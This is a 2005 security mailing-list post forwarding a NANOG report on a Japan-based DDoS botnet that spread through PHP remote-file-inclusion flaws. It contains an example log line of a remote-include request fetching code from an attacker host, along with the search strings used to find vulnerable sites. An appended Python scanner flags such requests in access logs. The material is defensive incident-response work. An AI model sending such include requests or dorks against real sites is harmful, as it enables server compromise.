[Dshield] [Fwd: Re:Destructive botnet originating from Japan]
cbrenton at chrisbrenton.org
Sat Dec 24 22:00:26 GMT 2005
The plot thickens...
-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Sat, 24 Dec 2005 10:44:10 -0800
> Here is a little update:
> As of last night authorities were able to seize the IRC server from
> the ISP in Japan and there will be extensive follow-up on it. The DDoS
> attack is now running headless in the happy range of about 3+ Gbps at
> around 7-9M PPS. The bots will continue attacking us until they
> receive the stop command from the bot master; there will never be a
> stop command, so we will continue to see packet love for a few months
> while people find that they are attacking us. We will publish a new
> list of the bots on Monday as we idle with this low traffic rate over
> the weekend.
> The attacker was targeting a couple customers that came into our
> environment after other solutions failed to work for them. After
> reviewing and comparing notes, it is obvious that the attacks were
> assassination attempts from a competitor. There was no extortion
> If you want to get the bots off your network, watch flow data
> destined to AS32787 with SYN floods to TCP 80 as the destination.
> Sites that use a PHP include (without validating the strings) to pull
> up different web sections and pages are at risk; a lot of people are
> reporting infection via "$section.php" and "$page.php". The attacker
> appears to have used Google to locate sites that use includes in that
> fashion (searching "index.php?page=" or "index.php?section=").
> Reviewing infected machines for logs related to 18.104.22.168 would be
> an easy way to locate a past infection, but it may not be reliable if the
> attacker starts a new botnet. An example of the log data looks
> something like this:
> grep 22.214.171.124 access_log
> 126.96.36.199 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//188.8.131.52/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
> Happy hunting and have nice holidays!
> Barrett Lyon
> CTO and founder
> Prolexic Technologies, Inc
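The log check Barrett describes (an absolute URL turning up in a "page" or "section" query parameter) can be scripted over an Apache access log. This is an added example, not code from the forwarded message or from Prolexic; the log lines and IP addresses in it are constructed from documentation ranges, and the parameter names to inspect are an assumption taken from the message.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access-log line: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A query value that is itself an absolute URL is the signature of a remote-include attempt.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def flag_remote_include(line, params=None):
    """Return (client, parameter, remote_url, user_agent) when a query parameter of the
    request carries an absolute URL, else None. `params` restricts the check to the
    named parameters (e.g. {'page', 'section'}) so legitimate URL-valued fields are skipped."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group('request').split(' ')
    if len(parts) != 3:          # malformed or truncated request line
        return None
    _method, target, _version = parts
    # parse_qsl percent-decodes, so "http%3A//" becomes "http://" before matching
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if params is not None and name not in params:
            continue
        if REMOTE_URL_RE.match(value):
            return (m.group('host'), name, value, m.group('agent'))
    return None

def scan(log_text, params=None):
    """Return the list of hits over every line of an access log."""
    return [h for h in (flag_remote_include(l, params) for l in log_text.splitlines()) if h]

# Constructed sample log (documentation IP ranges, not real indicators).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//192.0.2.10/x.txt? HTTP/1.0" 200 8010 "-" "Wget/1.6"
198.51.100.3 - - [23/Dec/2005:11:46:02 +0000] "GET /index.php?section=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Dec/2005:11:47:15 +0000] "GET /index.php?page=ftp%3A//192.0.2.10/x.txt HTTP/1.0" 200 8010 "-" "Wget/1.6"
198.51.100.9 - - [23/Dec/2005:11:48:40 +0000] "GET /index.php?page=about&ref=http://www.example.com/ HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for client, name, url, agent in scan(SAMPLE_LOG, params={"page", "section"}):
        print(f"{client} requested include of {url} via ?{name}= (agent: {agent})")
```

Without the `params` restriction the fourth sample line is also flagged because of its URL-valued `ref` parameter, so limit the check to the parameters your scripts actually pass to include().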